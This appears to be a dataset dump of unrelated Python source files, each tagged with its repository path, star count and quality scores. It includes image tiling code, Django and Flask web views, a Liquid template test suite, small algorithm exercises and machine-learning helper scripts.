                    logging.warning(">>>>>> Something went wrong during image slicing...")
        return paths

    def merge_images(self, paths, max_width, max_height, complete_path_to_merged_prediction):
        """
        Merge the result of each tile in a single image [reverse operation of the slice methods].

        :param paths: list of absolute tile paths, in slicing order
        :param max_width: the merged image width
        :param max_height: the merged image height
        :param complete_path_to_merged_prediction: absolute path to the merged final prediction
        """
        new_im = Image.new('RGBA', (max_width, max_height), (0, 0, 0, 0))

        x = 0
        y = 0
        buffer = settings.BUFFER_TO_INFERENCE
        for file in paths:
            img = Image.open(file).convert('RGBA')
            width, height = img.size
            img.thumbnail((width, height), Image.ANTIALIAS)

            # place tiles left-to-right; wrap to the next row (overlapping by
            # `buffer` pixels) when the tile would overflow the canvas
            if not ((x + width) > max_width) and not ((y + height) > max_height):
                new_im.paste(img, (x, y, x + width, y + height), mask=img)
            else:
                x = 0
                y += (height - buffer)
                new_im.paste(img, (x, y, x + width, y + height), mask=img)
            x += (width - buffer)

        new_im.convert("RGB").save(complete_path_to_merged_prediction, "PNG")
| 2.75 | 3 |
dsplot/tree/__init__.py | avere001/dsplot | 8 | 12770808 | from .binary_tree import BinaryTree
| 1.070313 | 1 |
liquid/golden/unless_tag.py | jg-rp/liquid | 19 | 12770809 | <filename>liquid/golden/unless_tag.py
"""Golden tests cases for testing liquid's `unless` tag."""
from liquid.golden.case import Case
# Each Case pairs a Liquid template using the `unless` tag with its expected
# rendered output. `unless` renders its block only when the condition is falsy.
cases = [
    Case(
        description="literal false condition",
        template=r"{% unless false %}foo{% endunless %}",
        expect="foo",
    ),
    Case(
        description="literal true condition",
        template=r"{% unless true %}foo{% endunless %}",
        expect="",
    ),
    Case(
        description="blocks that contain only whitespace are not rendered",
        template=r"{% unless false %} {% endunless %}",
        expect="",
    ),
    # `else` / `elsif` branches behave as in an `if` tag, inverted at the top
    Case(
        description="alternative block",
        template=r"{% unless true %}foo{% else %}bar{% endunless %}",
        expect="bar",
    ),
    Case(
        description="conditional alternative block",
        template=r"{% unless true %}foo{% elsif true %}bar{% endunless %}",
        expect="bar",
    ),
    Case(
        description="conditional alternative block with default",
        template=(
            r"{% unless true %}foo"
            r"{% elsif false %}bar"
            r"{% else %}hello"
            r"{% endunless %}"
        ),
        expect="hello",
    ),
]
| 2.28125 | 2 |
Contest/ABC001/b/main.py | mpses/AtCoder | 0 | 12770810 | <reponame>mpses/AtCoder<gh_stars>0
#!/usr/bin/env python3
def visibility_code(m):
    """Return the 2-character code for visibility ``m`` metres (AtCoder ABC001 B).

    Bands: below 100 m -> "00"; up to 5 km in 100 m steps ("01".."50");
    up to 30 km in 1 km steps ("56".."80"); up to 70 km in 5 km steps
    ("80".."88"); anything farther -> "89".
    """
    if m < 100:
        return "00"
    if m <= 5000:
        # 100 m steps, zero-padded: 100 -> "01", 5000 -> "50"
        return str(m // 100).zfill(2)
    if m <= 30000:
        # 1 km steps offset by 50: 6000 -> "56", 30000 -> "80"
        return str(m // 1000 + 50)
    if m <= 70000:
        # 5 km steps offset by 80: 35000 -> "81", 70000 -> "88"
        return str((m // 1000 - 30) // 5 + 80)
    return "89"


if __name__ == "__main__":
    # Guarded so the module can be imported (e.g. by tests) without blocking on stdin.
    print(visibility_code(int(input())))
algorithms/math/modular_exponentiation.py | jainrocky/python-ds | 1,723 | 12770811 | # to compute modular power
# Iterative Function to calculate
# (x^y)%p in O(log y)
def power(x, y, p) :
    """Compute (x ** y) % p by binary (square-and-multiply) exponentiation.

    Runs in O(log y) multiplications; intermediate values stay below p**2.
    Assumes y >= 0.
    """
    result = 1
    base = x % p  # reduce the base up front so products stay small
    exponent = y
    while exponent > 0:
        # fold the current base in whenever the low bit of the exponent is set
        if exponent % 2 == 1:
            result = (result * base) % p
        exponent //= 2
        base = (base * base) % p
    return result
tests/test_basics.py | leuchtum/folderman | 0 | 12770812 | <gh_stars>0
import pytest
from folderman import Folder
def test_root_path():
    """Placeholder test: asserts nothing yet (TODO: verify Folder root path handling)."""
    pass
| 1.085938 | 1 |
players/cheating_idiot_player.py | timotree3/hanabi-1 | 25 | 12770813 | """A despicable Hanabi player.
Cheating Idiot never hints. He peeks at his cards. When he has a play, he
picks one randomly. When he doesn't, he discards randomly.
"""
from hanabi_classes import *
from bot_utils import get_plays
class CheatingIdiotPlayer(AIPlayer):
    """Peeks at its own hand; plays a random playable card, else discards randomly."""

    @classmethod
    def get_name(cls):
        """Identifier used to select this bot."""
        return 'idiot'

    def __init__(self, *args):
        """Can be overridden to perform initialization, but must call super"""
        super(CheatingIdiotPlayer, self).__init__(*args)

    def play(self, r):
        """Return the ('play'|'discard', card) action for the current turn."""
        hand = r.h[r.whoseTurn].cards
        playable = get_plays(hand, r.progress)
        # never hints: either play something playable or discard at random
        if playable:
            return 'play', random.choice(playable)
        return 'discard', random.choice(hand)

    def end_game_logging(self):
        """Can be overridden to perform logging at the end of the game"""
        pass
| 3.140625 | 3 |
gpscraper/forms/permissions.py | alverelt/gpscraper | 1 | 12770814 | import json
def permissions(app_id):
    """Build the batchexecute form payload requesting permissions for *app_id*.

    Returns a dict with a single 'f.req' field holding the compact-JSON RPC
    envelope the Play Store endpoint expects.
    """
    rpc_call = [[
        'xdSrCf',
        '[[null,["%s",7],[]]]' % app_id,
        None,
        '1',
    ]]
    # the endpoint requires one more wrapping list and no whitespace
    return {'f.req': json.dumps([rpc_call], separators=(',', ':'))}
radicalsdk/radar/v1_constants.py | moodoki/radical_sdk | 7 | 12770815 | import os
import numpy as np
class TupperwearD435_0:
    """Calibration matrices for the Tupperware + D435 v1 rig (original P matrix)."""
    # F: matrix loaded from packaged v1 calibration data
    # (presumably a camera-radar fundamental/transform matrix -- TODO confirm)
    F = np.load(os.path.join(os.path.dirname(__file__), 'v1_data/f_matrix.npy'))
    # P: original (pre-revision) projection matrix -- TODO confirm semantics
    P = np.load(os.path.join(os.path.dirname(__file__), 'v1_data/p_matrix_original.npy'))
class TupperwearD435:
    """Calibration matrices for the Tupperware + D435 v1 rig (current P matrix)."""
    # F: same matrix file as TupperwearD435_0
    F = np.load(os.path.join(os.path.dirname(__file__), 'v1_data/f_matrix.npy'))
    # P: revised projection matrix -- TODO confirm semantics
    P = np.load(os.path.join(os.path.dirname(__file__), 'v1_data/p_matrix.npy'))
| 2.46875 | 2 |
src/pykeen/evaluation/__init__.py | camillepradel/pykeen | 2 | 12770816 | # -*- coding: utf-8 -*-
"""Evaluators.
========= =============================================
Name Reference
========= =============================================
rankbased :class:`pykeen.evaluation.RankBasedEvaluator`
sklearn :class:`pykeen.evaluation.SklearnEvaluator`
========= =============================================
.. note:: This table can be re-generated with ``pykeen ls evaluators -f rst``
========= =================================================
Name Reference
========= =================================================
rankbased :class:`pykeen.evaluation.RankBasedMetricResults`
sklearn :class:`pykeen.evaluation.SklearnMetricResults`
========= =================================================
.. note:: This table can be re-generated with ``pykeen ls metrics -f rst``
References
----------
.. [berrendorf2020] <NAME>, <NAME>, <NAME>, <NAME> (2020) `Interpretable and Fair
Comparison of Link Prediction or Entity Alignment Methods with Adjusted Mean Rank
<https://arxiv.org/abs/2002.06914>`_.
"""
import dataclasses
from typing import Mapping, Set, Type, Union
from .evaluator import Evaluator, MetricResults, evaluate
from .rank_based_evaluator import RankBasedEvaluator, RankBasedMetricResults
from .sklearn import SklearnEvaluator, SklearnMetricResults
from ..utils import get_cls, normalize_string
__all__ = [
    'evaluate',
    'Evaluator',
    'MetricResults',
    'RankBasedEvaluator',
    'RankBasedMetricResults',
    'SklearnEvaluator',
    'SklearnMetricResults',
    'metrics',
    'evaluators',
    'get_evaluator_cls',
    'get_metric_list',
]

# Class-name suffix stripped when building lookup keys
# (e.g. RankBasedEvaluator -> 'rankbased').
_EVALUATOR_SUFFIX = 'Evaluator'
_EVALUATORS: Set[Type[Evaluator]] = {
    RankBasedEvaluator,
    SklearnEvaluator,
}

#: A mapping of evaluators' names to their implementations
evaluators: Mapping[str, Type[Evaluator]] = {
    normalize_string(cls.__name__, suffix=_EVALUATOR_SUFFIX): cls
    for cls in _EVALUATORS
}
def get_evaluator_cls(query: Union[None, str, Type[Evaluator]]) -> Type[Evaluator]:
    """Resolve *query* (a name, a class, or None) to an evaluator class.

    Falls back to :class:`RankBasedEvaluator` when *query* is None.
    """
    resolved = get_cls(
        query,
        base=Evaluator,
        lookup_dict=evaluators,
        suffix=_EVALUATOR_SUFFIX,
        default=RankBasedEvaluator,
    )
    return resolved
# Class-name suffix stripped when building lookup keys
# (e.g. RankBasedMetricResults -> 'rankbased').
_METRICS_SUFFIX = 'MetricResults'
_METRICS: Set[Type[MetricResults]] = {
    RankBasedMetricResults,
    SklearnMetricResults,
}

#: A mapping of results' names to their implementations
metrics: Mapping[str, Type[MetricResults]] = {
    normalize_string(cls.__name__, suffix=_METRICS_SUFFIX): cls
    for cls in _METRICS
}
def get_metric_list():
    """Get info about all metrics across all evaluators.

    Returns a flat list of (dataclass field, results-class name, results class)
    triples, one per metric field of every registered MetricResults class.
    """
    entries = []
    for name, value in metrics.items():
        for field in dataclasses.fields(value):
            entries.append((field, name, value))
    return entries
| 1.71875 | 2 |
api/urls.py | NiklasMerz/shoppinglist | 0 | 12770817 | <reponame>NiklasMerz/shoppinglist
from django.urls import include, path
from rest_framework import routers
from api import views
from rest_framework.schemas import get_schema_view
# DRF router auto-generates list/detail routes for every registered viewset.
router = routers.DefaultRouter()
router.register(r'lists', views.ListViewSet)
router.register(r'catalogitems', views.CatalogItemViewSet)
router.register(r'items', views.ItemViewSet)
router.register(r'stores', views.StoreViewSet)
router.register(r'trips', views.TripViewSet)
router.register(r'checkouts', views.CheckoutViewSet)
router.register(r'receipts', views.ReceiptViewSet)
router.register(r'lineitems', views.LineItemsViewSet)

# Wire up our API using automatic URL routing.
# Additionally, we include login URLs for the browsable API.
urlpatterns = [
    path('', include(router.urls)),
    path('api-auth/', include('rest_framework.urls', namespace='rest_framework')),
    # OpenAPI schema for the API above.
    # NOTE(review): the version string contains literal quotes ("'0.0.1'") --
    # confirm that is intended
    path('openapi', get_schema_view(
        title='Shopping Advanced',
        description='API for mobile apps',
        version="'0.0.1'"
    ), name='openapi-schema'),
    # Non-openapi endpoints for receipt uploads
    path('file-receipt/json', views.ReceiptDataView.as_view(), name='file-receipt/json'),
    path('file-receipt/image', views.ReceiptImageView.as_view(), name='file-receipt/image'),
]
tally_ho/apps/tally/views/home.py | onaio/tally-ho | 12 | 12770818 | from django.urls import reverse
from django.shortcuts import redirect, render
from django.views.generic import TemplateView
from guardian.mixins import LoginRequiredMixin
from tally_ho.libs.permissions import groups
from tally_ho.apps.tally.models import UserProfile
# Maps each permission group to the URL name of its landing view; used by
# get_user_role_url to forward authenticated users after login.
GROUP_URLS = {
    groups.AUDIT_CLERK: "audit",
    groups.AUDIT_SUPERVISOR: "audit",
    groups.CLEARANCE_CLERK: "clearance",
    groups.CLEARANCE_SUPERVISOR: "clearance",
    groups.CORRECTIONS_CLERK: "corrections",
    groups.DATA_ENTRY_1_CLERK: "data-entry",
    groups.DATA_ENTRY_2_CLERK: "data-entry",
    groups.INTAKE_CLERK: "intake",
    groups.INTAKE_SUPERVISOR: "intake",
    groups.QUALITY_CONTROL_CLERK: "quality-control",
    groups.QUALITY_CONTROL_SUPERVISOR: "quality-control",
    groups.SUPER_ADMINISTRATOR: "super-administrator-tallies",
    groups.TALLY_MANAGER: "tally-manager",
}
def permission_denied(request):
    """Render the 403 (permission denied) error page."""
    return render(request, 'errors/403.html')
def not_found(request):
    """Render the 404 (not found) error page."""
    return render(request, 'errors/404.html')
def bad_request(request):
    """Render the 400 (bad request) error page."""
    return render(request, 'errors/400.html')
def server_error(request):
    """Render the 500 (server error) error page."""
    return render(request, 'errors/500.html')
def suspicious_error(request):
    """Render the 'suspicious operation' page, consuming any stored message."""
    # pop() reads and clears the one-shot session message in a single step;
    # the previous get/del pair left falsy-but-present values in the session.
    error_message = request.session.pop('error_message', None)
    return render(request,
                  'errors/suspicious.html',
                  {'error_message': error_message})
def get_user_role_url(user):
    """Return the landing URL for the user's first group, or None if no group."""
    if not user.groups.count():
        return None
    group = user.groups.all()[0]
    url_kwargs = {}
    # everyone except admins/managers is scoped to a tally
    if group.name not in (groups.TALLY_MANAGER, groups.SUPER_ADMINISTRATOR):
        profile = UserProfile.objects.get(id=user.id)
        if not profile.tally:
            return reverse('home-no-tally')
        url_kwargs = {'tally_id': profile.tally.id}
    return reverse(GROUP_URLS.get(group.name), kwargs=url_kwargs)
class HomeView(LoginRequiredMixin, TemplateView):
    """Landing page; authenticated users are forwarded to their role's view."""
    template_name = "home.html"

    def redirect_user_to_role_view(self):
        """Return a redirect to the user's role view, or None if no group matched."""
        user = self.request.user
        redirect_url = get_user_role_url(user)
        if redirect_url:
            return redirect(redirect_url)
        return None

    def dispatch(self, request, *args, **kwargs):
        # bind request before TemplateView does, so the helper above can read it
        self.request = request
        redirect_response = self.redirect_user_to_role_view()
        if redirect_response:
            return redirect_response
        return super(HomeView, self).dispatch(request, *args, **kwargs)
class LocaleView(TemplateView):
    """Persist a locale choice in the session, then redirect onward."""

    def get(self, *args, **kwargs):
        params = self.request.GET
        chosen = params.get('locale')
        if chosen:
            self.request.session['locale'] = chosen
            self.request.session['django_language'] = chosen
        # fall back to home for empty or self-referential targets
        target = params.get('next', 'home')
        if not target or target.startswith('locale'):
            target = 'home'
        return redirect(target)
class NoTallyView(LoginRequiredMixin, TemplateView):
    """Shown to authenticated users whose profile has no tally assigned."""
    template_name = "no_tally_assigned.html"
| 1.859375 | 2 |
name_recommender/pipeline/run_lstm_model.py | lassevalentini/NameRecommender | 0 | 12770819 | <gh_stars>0
import json
import joblib
from azureml.core.model import Model
# Called when the service is loaded
def init():
    """Azure ML entry point: load the registered model into a module global."""
    global model
    # Get the path to the deployed model file and load it
    model_path = Model.get_model_path("name_lstm")
    model = joblib.load(model_path)
# Called when a request is received
def run(raw_data):
    """Azure ML entry point: score a request and return recommendations as JSON.

    The JSON body may be either a list of recommendation indices or a plain
    integer count of recommendations to generate.
    """
    payload = json.loads(raw_data)
    if isinstance(payload, list):
        # Generate enough recommendations to cover the largest requested index,
        # then select by index. (The original tested `payload is list`, which is
        # always False, so this branch never ran; it also generated only
        # `max_id` items, one short of covering index `max_id` itself.)
        max_id = max(payload)
        expanded_list = [model.make_recommendation() for _ in range(max_id + 1)]
        predictions = [expanded_list[i] for i in payload]
    else:
        # payload is a count of fresh recommendations to produce
        predictions = [model.make_recommendation() for _ in range(payload)]
    # Return the predictions as JSON
    return json.dumps(predictions)
| 2.875 | 3 |
asset/api.py | 745184532/cmdb | 251 | 12770820 | from rest_framework import generics
from .models import AssetInfo
from .serializers import AssetSerializer
from rest_framework import permissions
class AssetList(generics.ListCreateAPIView):
    """GET: list all assets; POST: create one. Open to any caller (AllowAny)."""
    queryset = AssetInfo.objects.all()
    serializer_class = AssetSerializer
    permission_classes = (permissions.AllowAny,)
class AssetDetail(generics.RetrieveUpdateDestroyAPIView):
    """GET/PUT/PATCH/DELETE a single asset by pk. Open to any caller (AllowAny)."""
    queryset = AssetInfo.objects.all()
    serializer_class = AssetSerializer
    permission_classes = (permissions.AllowAny,)
| 1.960938 | 2 |
chaussette/_paste.py | ProzorroUKR/chaussette | 74 | 12770821 | <gh_stars>10-100
import os
from six.moves import configparser
from logging.config import fileConfig
try:
from paste.deploy import loadapp
except ImportError:
raise ImportError("You need to install PasteDeploy")
def paste_app(path):
    """Load a WSGI app from a Paste Deploy config file.

    *path* may carry a '#app_name' fragment selecting which app to load from
    the file. If the .ini file defines a [loggers] section, its logging
    configuration is applied before the app is loaded.
    """
    config_path, frag, app_name = path.partition('#')
    parser = configparser.ConfigParser()
    parser.read([config_path])
    if parser.has_section('loggers'):
        abs_config = os.path.abspath(config_path)
        fileConfig(
            abs_config,
            dict(__file__=abs_config, here=os.path.dirname(abs_config))
        )
    # re-attach the fragment (if any) so loadapp picks the requested app
    return loadapp('config:%s%s%s' % (os.path.abspath(config_path), frag, app_name))
| 2.375 | 2 |
backend/bitcoin_arbitrage/api/views.py | landdafku11/cryptocurrencybot | 1 | 12770822 | <reponame>landdafku11/cryptocurrencybot
import logging
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from rest_framework.views import APIView
from bitcoin_arbitrage.models import Spread, Tri_Spread
from bitcoin_arbitrage.api.mixins import MonitorMixin
from .serializers import (
ActionSerialier,
serialize_change
)
logger = logging.getLogger(__name__)
# ~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~
# Spread endpoints.
# ~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~
class RealTimeSpreadEndpoint(APIView):
permission_classes = [IsAuthenticated]
def get(self, request, *args, **kwargs):
try:
all_spreads = []
for spread in Spread.objects.all().order_by('-recorded_date')[:5]:
xchange_buy = spread.xchange_buy
xchange_sell = spread.xchange_sell
all_spreads.append({
"id": spread.pk,
"exchange_buy_id": spread.exchange_buy_id,
"exchange_sell_id": spread.exchange_sell_id,
"xchange_buy": serialize_change(xchange_buy),
"xchange_sell": serialize_change(xchange_sell),
"recorded_date": spread.recorded_date,
"spread": spread.spread
})
except Exception as error:
logger.exception(str(error))
return Response({"status": "error"}, status=400)
return Response({"spreads": all_spreads}, status=200)
class TriSpread(APIView):
permission_classes = [IsAuthenticated]
def get(self, request, *args, **kwargs):
try:
tri_spreads = []
for spread in Tri_Spread.objects.all().order_by('-recorded_date'):
tri_xchange_buy1 = spread.tri_xchange_buy1
tri_xchange_buy2 = spread.tri_xchange_buy2
tri_xchange_sell = spread.tri_xchange_sell
tri_spreads.append({
"id": spread.pk,
"tri_exchange_buy1_id": spread.tri_exchange_buy1_id,
"tri_exchange_sell_id": spread.tri_exchange_sell_id,
"tri_exchange_buy2_id": spread.tri_exchange_buy2_id,
"tri_xchange_buy1": serialize_change(tri_xchange_buy1),
"tri_xchange_buy2": serialize_change(tri_xchange_buy2),
"tri_xchange_sell": serialize_change(tri_xchange_sell),
"recorded_date": spread.recorded_date,
"tri_spread": spread.tri_spread
})
except Exception as error:
logger.exception(str(error))
return Response({"status": "error"}, status=400)
return Response({"tri_spreads": tri_spreads}, status=200)
# ~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~
# Monitor Endpoints
# ~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~+~
class TriangularMonitor(APIView, MonitorMixin):
permission_classes = [IsAuthenticated]
def post(self, request, *args, **kwargs):
file_name = "trinangular_monitor.txt"
username = request.user.username
kwargs = {
"file": file_name,
"monitor": "start_tri",
"user": username
}
serializer = ActionSerialier(data=request.data)
if serializer.is_valid():
action = serializer.data.get("action")
if action == "start":
if self.start_monitor(**kwargs):
return Response({"status": "success"}, status=200)
return Response({"status": "error"}, status=400)
elif action == "stop":
if self.stop_monitor(username, file_name):
return Response({"status": "success"}, status=200)
return Response({"status": "success"}, status=200)
return Response({"status": "error"}, status=400)
return Response({"status": serializer.errors}, status=400)
class InterExchangeMonitor(APIView, MonitorMixin):
permission_classes = [IsAuthenticated]
def post(self, request, *args, **kwargs):
file_name = "inter_exchange_monitor.txt"
username = request.user.username
kwargs = {
"file": file_name,
"monitor": "start_tri",
"user": username
}
serializer = ActionSerialier(data=request.data)
if serializer.is_valid():
action = serializer.data.get("action")
if action == "start":
if self.start_monitor(**kwargs):
return Response({"status": "success"}, status=200)
return Response({"status": "error"}, status=400)
elif action == "stop":
if self.stop_monitor(username, file_name):
return Response({"status": "success"}, status=200)
return Response({"status": "error"}, status=400)
return Response({"status": "error"}, status=400)
return Response({"status": serializer.errors}, status=400)
class StrategyBacktestMonitor(APIView, MonitorMixin):
permission_classes = [IsAuthenticated]
def post(self, request, *args, **kwargs):
file_name = "strategy_back_test_monitor.txt"
username = request.user.username
kwargs = {
"file": file_name,
"monitor": "start_backtest",
"user": username
}
serializer = ActionSerialier(data=request.data)
if serializer.is_valid():
action = serializer.data.get("action")
if action == "start":
if self.start_monitor(**kwargs):
return Response({"status": "success"}, status=200)
return Response({"status": "success"}, status=200)
elif action == "stop":
if self.stop_monitor(username, file_name):
return Response({"status": "success"}, status=200)
return Response({"status": "error"}, status=400)
return Response({"status": "error"}, status=400)
return Response({"status": serializer.errors}, status=400)
| 2.078125 | 2 |
utils/slack_msg_fmt.py | angeleneleow/rocket2 | 14 | 12770823 | <filename>utils/slack_msg_fmt.py
"""Utility class for formatting Slack Messages."""
def wrap_slack_code(str):
"""Format code."""
return f"`{str}`"
def wrap_code_block(str):
"""Format code block."""
return f"```\n{str}\n```"
def wrap_quote(str):
"""Format quote."""
return f"> {str}\n"
def wrap_emph(str):
"""Format emph."""
return f"*{str}*"
| 2.171875 | 2 |
transparentai_ui/app/controllers/projects.py | Nathanlauga/transparentai-ui | 1 | 12770824 | from flask import request, render_template, redirect, url_for, session, jsonify, abort
from flask_babel import _
import os.path
import pandas as pd
from transparentai import sustainable
from ..models import Project
from ..models.modules import ModuleSustainable
from .services.projects import format_project, control_project, load_modules, init_anwsers
from .services.modules import sustainable as sustainable_module
from .services.commons import get_header_attributes
from .controller_class import Controller
from ..utils import add_in_db, exists_in_db
from ..src import get_questions
project_controller = Controller(component=Project,
format_fn=format_project,
control_fn=control_project,
module_fn=load_modules)
sustainable_controller = Controller(
component=ModuleSustainable,
format_fn=sustainable_module.format_module,
control_fn=sustainable_module.control_module)
def index():
title = _('Projects')
header = get_header_attributes()
projects = project_controller.index()
return render_template("projects/index.html",
title=title,
session=session,
projects=projects,
header=header)
def get_all_instances_json():
projects = project_controller.index()
projects = [elem.to_dict() for elem in projects]
return jsonify(projects)
def new():
title = _('Create a new project')
header = get_header_attributes()
previous = request.form
if request.method == 'POST':
project = project_controller.create()
init_anwsers(project)
if project is not None:
return redirect(url_for('projects.get_instance',
name=project.name))
return render_template("projects/new.html",
title=title,
session=session,
header=header,
previous=previous)
def edit(name):
title = _('Edit ') + name
header = get_header_attributes()
project = project_controller.get_instance(name)
previous = project.to_dict()
# Temporary until handle list in form
previous['members'] = ', '.join(previous['members'])
if request.method == 'POST':
previous = request.form
project = project_controller.update(name)
if project is not None:
return redirect(url_for('projects.get_instance',
name=project.name))
return render_template("projects/edit.html",
title=title,
session=session,
header=header,
previous=previous,
project=project)
def get_instance(name):
project = project_controller.get_instance(name)
if project is None:
return redirect(url_for('projects.index'))
title = name
header = get_header_attributes()
header['current_project'] = name
questions = get_questions()
return render_template("projects/instance.html",
session=session,
project=project,
header=header,
title=title,
questions=questions)
def get_instance_json(name):
project = project_controller.get_instance(name)
return jsonify(project.to_dict())
def create():
project = project_controller.create()
init_anwsers(project)
return redirect(url_for('projects.index'))
def update(name):
project_controller.update(name)
return redirect(url_for('projects.get_instance', name=name))
def delete(name):
project_controller.delete(name)
return redirect(url_for('projects.index'))
def post_instance(name):
form_data = request.form
if '_method' not in form_data:
return redirect(url_for('projects.get_instance', name=name))
method = form_data['_method']
if method == 'POST':
return create()
elif method == 'PUT':
return update(name)
elif method == 'DELETE':
return delete(name)
return redirect(url_for('projects.get_instance', name=name))
def estimate_co2(name):
title = _('Estimate CO2: ') + name
header = get_header_attributes()
project = project_controller.get_instance(name)
if project is not None:
header['current_project'] = project.name
module = project.module_sustainable
if module is None:
return abort(404)
previous = module.to_dict()
if request.method == 'POST':
previous = request.form
module = sustainable_controller.update(module.id, id_col='id')
if module is not None:
sustainable_module.compute_co2_estimation(project)
return redirect(url_for('projects.estimate_co2', name=name))
locations = list(sustainable.get_energy_data().keys())
return render_template("modules/estimate_co2.html",
session=session,
previous=previous,
header=header,
title=title,
project=project,
locations=locations)
def modules(name):
title = _('Analytics libraries')
header = get_header_attributes()
project = project_controller.get_instance(name)
header['current_project'] = name
dataset = project.dataset
model = dataset.model if dataset is not None else None
return render_template("projects/modules/index.html",
title=title,
session=session,
header=header,
project=project,
dataset=dataset,
model=model)
def components(name):
title = _('Project components')
header = get_header_attributes()
project = project_controller.get_instance(name)
header['current_project'] = name
dataset = project.dataset
model = dataset.model if dataset is not None else None
return render_template("projects/components/index.html",
title=title,
session=session,
header=header,
project=project,
dataset=dataset,
model=model)
def evaluation(name):
title = _('Trusting evaluation')
header = get_header_attributes()
project = project_controller.get_instance(name)
header['current_project'] = name
dataset = project.dataset
model = dataset.model if dataset is not None else None
questions = get_questions()
return render_template("projects/evaluation/index.html",
title=title,
session=session,
header=header,
project=project,
dataset=dataset,
model=model,
questions=questions)
def model(name):
return redirect(url_for('models.get_instance', name=name))
def dataset(name):
return redirect(url_for('datasets.get_instance', name=name))
| 2.40625 | 2 |
languages/python/2.learn_more_py_the_hard_way/ex06/find.py | banminkyoz/learn | 4 | 12770825 | <filename>languages/python/2.learn_more_py_the_hard_way/ex06/find.py
from sys import exit
import argparse
import os.path
import re
class Find:
args = ()
result_count = 0
def __init__(self):
self.get_arguments()
self.check_arguments()
self.search()
def get_arguments(self):
parser = argparse.ArgumentParser(description='Find file(s) or folder(s)')
parser.add_argument('searchDir', metavar="Search Directory", help="Directory to start search from")
parser.add_argument('searchContent', metavar="Search Content", help="File, Directory name or Regex")
parser.add_argument("--type", "-t", metavar='type', help="Type (d: Directory or f: File)", default="f")
self.args = parser.parse_args()
def check_arguments(self):
if not os.path.isdir(self.args.searchDir):
print("Directory is not exist")
exit(1)
def search(self):
self.result_count = 0
for root, dirs, files in os.walk(self.args.searchDir):
if self.args.type == "f":
self.print_result(files)
else:
self.print_result(dirs)
if self.result_count == 0:
print("No result found !")
def print_result(self, list):
for item in list:
if re.search(self.args.searchContent, item):
self.result_count += 1
print(item)
find = Find()
| 3.578125 | 4 |
python/constants.py | raymonshansen/dungeon | 4 | 12770826 | import pygame as pg
TILE_D = 32
# Comment in for small or big screen
# HD screen
SCREEN_TW, SCREEN_TH = 50, 30
# Low res screen
SCREEN_TW, SCREEN_TH = 35, 20
SCREEN_W_PX = SCREEN_TW * TILE_D
SCREEN_H_PX = SCREEN_TH * TILE_D
SCREEN_SIZE = (SCREEN_W_PX, SCREEN_H_PX)
MAP_VIEW_TW = int(SCREEN_TW * 0.7)
MAP_VIEW_TH = int(SCREEN_TH * 0.8)
STAT_VIEW_TW = MAP_VIEW_TW
STAT_VIEW_TH = SCREEN_TH - MAP_VIEW_TH
LOG_VIEW_TW = SCREEN_TW - MAP_VIEW_TW
LOG_VIEW_TH = SCREEN_TH
MAP_DIM = (TILE_D*MAP_VIEW_TW, TILE_D*MAP_VIEW_TH)
STAT_DIM = (TILE_D*STAT_VIEW_TW, TILE_D*STAT_VIEW_TH)
LOG_DIM = (TILE_D*LOG_VIEW_TW, TILE_D*LOG_VIEW_TH)
MAP_POS = pg.Rect(0, 0, MAP_DIM[0], MAP_DIM[1])
STAT_POS = pg.Rect(0, TILE_D*MAP_VIEW_TH, STAT_DIM[0], STAT_DIM[1])
LOG_POS = pg.Rect(TILE_D*MAP_VIEW_TW, 0, LOG_DIM[0], LOG_DIM[1])
DIRECTIONS = {'NW': (-1, -1),
'N': (0, -1),
'NE': (1, -1),
'W': (-1, 0),
'E': (1, 0),
'SW': (-1, 1),
'S': (0, 1),
'SE': (1, 1)}
FOUR_DIRECTIONS = {'N': (0, -1),
'W': (-1, 0),
'E': (1, 0),
'S': (0, 1)}
# Font
LOG_FONTSIZE = TILE_D // 2
# Main Menu
MAINMENU_ITEM_LABELS = ["Resume",
"Editor",
"Quit",
]
MAINMENU_ITEM_INFO = ["Resume the game.",
"Switch between 'Game' and 'Editor' mode. This is a future feature not yet implemented.",
"Quit the game. Without saving.",
]
MAINMENU_FONTSIZE = TILE_D * 2
MAINMENU_BGCOL = pg.color.Color("black")
MAINMENU_DEFAULT_COL = pg.color.Color("antiquewhite")
MAINMENU_SELECTED_COL = pg.color.Color("goldenrod")
| 2.5 | 2 |
data_collection/gazette/spiders/sc_pescaria_brava.py | kaiocp/querido-diario | 454 | 12770827 | from gazette.spiders.base.fecam import FecamGazetteSpider
class ScPescariaBravaSpider(FecamGazetteSpider):
name = "sc_pescaria_brava"
FECAM_QUERY = 'entidade:"Prefeitura Municipal de Pescaria Brava"'
TERRITORY_ID = "4212650"
| 1.375 | 1 |
testa_usuario.py | ecompfin-ufrgs/economia_computacional1 | 2 | 12770828 | <filename>testa_usuario.py
"""
Programa 2
Descrição: Este programa pede a entrada de dados pelo usuário
até que o dado seja do tipo adequado.
Autor: <NAME>
Versão: 0.0.1
"""
# Entrada
# Atribuição de variáveis: usuários do sistema
usuario1 = "nelson"
usuario2 = "joao"
usuario3 = "juan"
usuario4 = "nathan"
while True:
usuario = input("\nQual o seu nome de usuário?")
if usuario == usuario1:
print(f"\nBenvindo ao sistema, {usuario1}")
break
elif usuario == usuario2:
print(f"\nBenvindo ao sistema, {usuario2}")
break
elif usuario == usuario2:
print(f"\nBenvindo ao sistema, {usuario3}")
break
elif usuario == usuario2:
print(f"\nBenvindo ao sistema, {usuario4}")
break
else:
print("\nUsuário inválido. Tente novamente!")
# Processamento
# Saída
| 3.625 | 4 |
tests/test_nrms/test_nrms.py | ParticleMedia/recommenders | 0 | 12770829 | """Global settings and imports"""
import sys
sys.path.append("../../")
import os
import numpy as np
import zipfile
from tqdm import tqdm
import scrapbook as sb
from tempfile import TemporaryDirectory
import tensorflow as tf
tf.get_logger().setLevel('ERROR') # only show error messages
from reco_utils.recommender.deeprec.deeprec_utils import download_deeprec_resources
from reco_utils.recommender.newsrec.newsrec_utils import prepare_hparams
from reco_utils.recommender.newsrec.models.nrms import NRMSModel
